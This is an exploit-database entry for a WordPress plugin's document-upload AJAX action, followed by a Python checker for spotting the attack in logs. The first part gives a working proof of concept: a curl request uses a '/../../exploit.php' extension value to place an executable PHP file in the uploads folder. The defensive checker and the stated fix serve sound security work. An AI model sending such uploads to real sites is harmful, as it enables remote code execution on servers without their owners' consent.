## https://sploitus.com/exploit?id=WPEX-ID:67F3948E-27D4-47A8-8572-616143B9CF43
1) Create a file named exploit.php, which contains: <?php phpinfo();

2) Find the upf_ajax_nonce on the site's front page.

3) Run the following cURL request:

curl --url 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -b 'YOUR COOKIES' -F 'docfile=@exploit.php' -F 'docext=/../../exploit.php' -F 'doc_type=doc/pdf' -F 'action=upload_doc_callback' -F 'upf_nonce=YOUR NONCE'

You can find the uploaded PHP file at: https://target/blog/wp-content/uploads/exploit.php
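
For defenders reviewing WAF or audit logs, the following added example (not part of the original advisory and not the plugin's code) checks parsed form fields of an `upload_doc_callback` submission for a `docext` value that is not a plain extension. The allowlist, the upload directory and the way the destination path is modelled are assumptions made for illustration.

```python
import posixpath
import re

# Assumptions (not from the page): the extension allowlist, the upload
# directory, and the "name + docext" join used to model the write path.
ALLOWED_EXTS = {"pdf", "doc", "docx"}
EXECUTABLE_EXTS = {"php", "phtml", "phar", "php5", "php7"}
UPLOAD_DIR = "/var/www/html/wp-content/uploads/docs"
PLAIN_EXT = re.compile(r"[A-Za-z0-9]{1,8}")


def resolve_dest(ext, upload_dir=UPLOAD_DIR):
    """Path a naive 'upload' + docext concatenation would resolve to."""
    return posixpath.normpath(posixpath.join(upload_dir, "upload" + ext))


def check_upload_fields(fields, upload_dir=UPLOAD_DIR):
    """Return findings for one parsed admin-ajax.php form submission."""
    if fields.get("action") != "upload_doc_callback":
        return []  # not the upload action used in the request above
    findings = []
    ext = fields.get("docext", "")
    bare = ext[1:] if ext.startswith(".") else ext
    if any(ch in ext for ch in ("/", "\\", "\x00")) or ".." in ext:
        findings.append("docext contains path characters")
    if not PLAIN_EXT.fullmatch(bare) or bare.lower() not in ALLOWED_EXTS:
        findings.append("docext not in allowlist")
    dest = resolve_dest(ext, upload_dir)
    if not dest.startswith(upload_dir.rstrip("/") + "/"):
        findings.append("resolved path leaves upload directory")
    if posixpath.splitext(dest)[1].lstrip(".").lower() in EXECUTABLE_EXTS:
        findings.append("resolved name is server-executable")
    return findings


# Constructed sample submissions: the first mirrors the form fields of the
# cURL request above, the second is an ordinary document upload.
SAMPLES = [
    {"action": "upload_doc_callback", "doc_type": "doc/pdf",
     "docext": "/../../exploit.php"},
    {"action": "upload_doc_callback", "doc_type": "doc/pdf", "docext": "pdf"},
]

if __name__ == "__main__":
    for fields in SAMPLES:
        print(repr(fields["docext"]), "->", check_upload_fields(fields) or "ok")
```

The same two rules (extension taken from an allowlist, destination path confined to the upload directory after normalisation) are what a server-side fix needs to enforce before writing the file.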